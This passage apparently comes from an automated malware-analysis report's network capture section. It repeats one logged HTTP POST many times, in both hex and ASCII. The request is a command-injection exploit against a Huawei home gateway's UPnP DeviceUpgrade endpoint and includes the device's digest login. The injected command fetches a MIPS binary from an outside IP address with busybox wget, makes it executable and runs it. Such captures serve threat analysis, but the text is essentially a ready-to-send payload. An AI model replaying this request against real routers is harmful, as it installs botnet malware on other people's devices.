30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 